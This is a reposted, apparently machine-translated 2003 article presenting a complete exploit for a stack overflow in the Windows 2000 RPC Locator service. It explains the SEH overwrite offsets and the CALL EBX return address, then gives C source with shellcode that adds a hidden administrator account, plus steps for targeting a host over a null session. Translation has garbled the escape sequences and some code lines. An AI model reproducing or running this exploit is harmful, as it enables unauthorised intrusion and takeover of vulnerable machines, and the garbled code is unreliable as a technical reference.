2. Tech
  3. [Analysis] MS RPC LOCATOR Service Exploit for Win2k (New Version)

[Analysis] MS RPC LOCATOR Service Exploit for Win2k (New Version)

xiaoxiao2021-03-06  22

MS RPC LOCATOR Service Exploit for Win2k (New Version)

Create time: 2003-04-07

Article attribute: original

Article submission:

Eyas (EY4S_AT_21CN.COM)

/ * ------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- ------------------------------------

Created at: 2003-04-05

Last Updated: 2003-04-07

A few days ago, I downloaded RPCEXP.C in PacketStorm, I didn't succeed, but the Locator service was dropped. So I thought about it.

Winning. Later, I found some information, it turned out to be a stack overflow, and the problem was in the WCSCPY function. Tracking, the function call relationship is

Such:

LOCATOR! LOCATOR :: NSI_BINDING_LOOKUP_BEGIN:

| __locator! locator :: nsi_binding_lookup_begin_name:

| __locator! Cremotelookuphandle :: Finished:

| __locator! cbroadcastlookuphandle :: Initialize:

| __locator! GetBroadcastResults

| __locator! FormQueryPacket

| __WCSCPY <- Buff overflow

The return address of the GetBroadcastResults function is in BUFF 0x514, Tested, Win2K Chinese, English SP0-3

Overflow points are the same. But if you override the return address of the getBroadcastResults function, in Locator! FormQueryPacket

The latter code will appear 0xc0000005 errors, so, then, then cover SEH. Exception Handler Address

Store at BUFF 0x504, the Chinese and English SP0-3 versions are the same. Marcin Wolak writes rpcexp.c's JMPaddr is 0x0090F8F0,

I estimate that this address is when he is testing, shellcode stores the address, he jumps directly to Shellcode at SEHELLCODE.

Because I am tested, WCSCPY will bring our buff copy to 0x009xxxxx, of course, this test on different platforms.

It will be different, even the difference is very different. Just guess, because I started this, I can't understand his code :(.

After rewritten SEH clearly pointing to JMP ESP, it is later discovered that when Exception occurs.

The Windows system is preparing to handle an extraction of Exception, and the register EBX is correct to the current storage of the Exception Handler address.

Address -4, that is, if the Exception Handler address is stored in 0x0098F8EC, the EBX value is 0x0098F8E8. In this case,

Change the address of the Exception Handler address to the address of the Call EBX to execute our shellcode. Later, I came back to see Mo Da.

At the time of the article, I saw this already written in his article. I read the information too serious: (. "But not said

The principle, so why don't you know?

The address of Call EBX is not universal on different platforms, and later looked at the Locator.exe version on each platform, found SP0, SP1

The middle version is 5.0.2195.1, the SP2 version is 5.0.2195.2505, the SP3 version is 5.0.2195.3761, and the release after the patch is 5.0.2195.6136. Locator.exe version is less modified, so we decided to use the Call EBX address inside LOCATOR.exe, kernel32

These DLLs, almost every hotfixs are updated, and it is very uncommon with the CALL EBX address in it.

When searching, there are 10 SP1, SP2, and there is 10, SP1 and SP3 in SP1 and SP3, SP2 and SP3.

There is no different address. But I also found a very fun place, such as SP1 in 0x0100A8EB with Call EBX, then SP3 is in 0x0100A8EC

There is also a Call EBX, hehe. .

After comparison, JMP addr decided to use 0x0100Aee5, in SP0, SP1, SP2,

0: 004> u 0x0100aee5

0100AEE5 FFD3 Call EBX

In SP3,

0: 004> u 0x0100aee5

0100AEE5 40 Inc EAX

0100AEE6 FFD3 Call EBX

The buff structure we sent is as follows:

| RPC_HEAD_INFO? (8) | NOP ​​(0x4f8) | JMP 0xA (2) | NOP ​​(2) | Call EBX AddR (4) | NOP ​​(4) | Shellcode |

Shellcode has no special requirements, as long as there is no "x00 / x00", it will be truncated by WCSCPY.

SHELLCODE code is directly from a great article, thanks to him, thanks to great, backnd, ipxodi and other wonderful

About Windows platform buffer overflowing articles.

-------------------------------------------------- ----------------------------------- * /

#define unicode

#define rpc_unicode_supported

#include

#include

#include

#pragma comment (Lib, "RPCNS4.LIB")

// SEH HANDLER address offset, all version overflow points of Win2K

#define sehoffset 0x504

// Call EBX Addr in Locator.exe Process

/ *

SP0 SP1 SP2

0: 004> u 0x0100aee5

0100AEE5 FFD3 Call EBX

SP3

0: 004> u 0x0100aee5

0100AEE5 40 Inc EAX

0100AEE6 FFD3 Call EBX

* /

#define jmpaddr "/ xe5 / xae / x00 / x01"

#define jmpover "/ xeb / x0a / x90 / x90" // jmp 0xa

// hey, guy, you will modify this code slightly by yourself.

Char shellcode [] =

"/ x55 / x8b / xec / xeb / x64 / x5a / xb8 / x04"

"/ X00 / XF1 / X77 / X81 / X38 / X4D / X5A / X90"

"/ X00 / X74 / X03 / X48 / XEB / XF5 / X8B / XD8"

"/ x8b / x73 / x3c / x03 / x0 / x8b / x76 / x78"

"/ x03 / xf3 / x8b / x7e / x20 / x03 / xfb / x8b"

"/ x4e / x14 / x33 / xed / x56 / x57 / x51 / x8b"

"/ x3f / x03 / xfb / x8b / xf2 / x33 / xc9 / x83"

"/ XC1 / X0E / XF3 / XA6 / X74 / X08 / X59 / X5F"

"/ X83 / XC7 / X04 / X45 / XE2 / XE7 / X59 / X5F"

"/ x5e / x8b / xcd / x8b / x46 / x24 / x03 / xc3"

"/ XD1 / XE1 / X03 / XC1 / X33 / XC9 / X66 / X8B"

"/ x08 / x8b / x46 / x1c / x03 / xc3 / xc1 / xe1"

"/ x02 / x03 / xc1 / x8b / x00 / x03 / xc3 / Xeb"

"/ X02 / XEB / X37 / X8B / XFA / X8B / XF2 / X89"

"/ x06 / x83 / xc7 / x0f / x57 / x53 / xff / xd0"

"/ X83 / X06 / X04 / X89 / X06 / X83 / XC7 / X08"

"/ x57 / x53 / x8b / x46 / xfc / xff / xd0 / x83"

"/ xc6 / x04 / x89 / x06 / x33 / xc0 / x50 / x83"

"/ XC7 / X06 / X57 / X8B / X46 / XFC / XFF / XD0"

"/ XB8 / XFF / XFF / XFF / XFF / X50 / X8B / X06"

"/ XFF / XD0 / XE8 / X5E / XFF / XFF / XFF"

"getprocaddress" "/ x0"

"Winexec" "/ x0"

"Sleep" "/ x0"

"cmd / c net.exe user xx 1a! .9nh / add && net localgroup administrators xx / add";

DWORD WINAPI FUNC (LPVOID LP)

{

UNSIGNED Char Buff [4000];

UNSIGNED Short * pszstrbinding = NULL;

RPC_NS_HANDLE HNSHANDLE;

Unsigned long nssxtXType = rpc_c_ns_syntax_default;

RPC_STATUS STATUS;

Unsigned long i;

// Plug BUFF

BUFF [0] = '/';

BUFF [1] = 0;

BUFF [2] = '.';

BUF [3] = 0;

BUFF [4] = ':';

BUFF [5] = 0;

BUFF [6] = '/';

BUFF [7] = 0;

For (i = 8; i

{

BUF [I] = '/ x90';

}

STRCPY (& BUFF [I], JMPOVER);

// jmpaddr may contain 0

Memcpy (& Buff [i 4], JMPAddr, 4);

STRCPY (& BUFF [i 8], "/ X90 / X90 / X90 / X90");

Memcpy (& buff [i 12], shellcode, sizeof (shellcode);

RPCTRYEXCEPT {

Status = rpcnsbindinglookupbegin (NSSNTXTYPE,

(unsigned short *) BUFF,

0,

NULL,

0,

& hnshandle);

Printf ("rpcnsbindinglookupbegin returned 0x% x / n", status);

}

RPCEXCEPT (1)

{

Printf ("RPC runtime raised exception 0x% x / n", RPCEXCEPTIONCODE ());

}

RPCENDEXCEPT

Return 0;

}

Void usage ()

{

Printf ("/ NXLocator - MS RPC Locator Service Exploit for Win2k_en_Cn_SP0-3 / N"

"Author: cooleyas@21cn.com 2003-04-07 / N"

"Based on marcin wolak / 's rpcexp.c / n / N"

Usage: / n "

"1.set Registry VALUES IN YOUR WORKSTATION AS BELOW: / N"

"HKLM // Software // Microsoft // RPC // Nameservice // NetworkAddress = targetip / n"

"HKLM // Software // Microsoft // RPC // NameService // ServerNetworkAddress = targetip / n"

"2.Stablish Null Session: Net Use Targetip // IPC $ /" / "/ u: /" / n "

"3.Run Exploit: Xlocator / N"

"If Success, Target Will Add A User /" XX / "Passwd IS / "1a !.9nh/"./N");

}

Void _Crtapi1 Main (int Argc, char ** argv)

{

IF (argc! = 1)

{

USAGE ();

exit (0);

}

CreateThread (NULL, 0, FUNC, NULL, 0, NULL);

Sleep (4000);

Printf ("DONE./N");

} / * End of main * /

转载请注明原文地址:https://www.9cbs.com/read-40910.html

9cbs

New Post(0)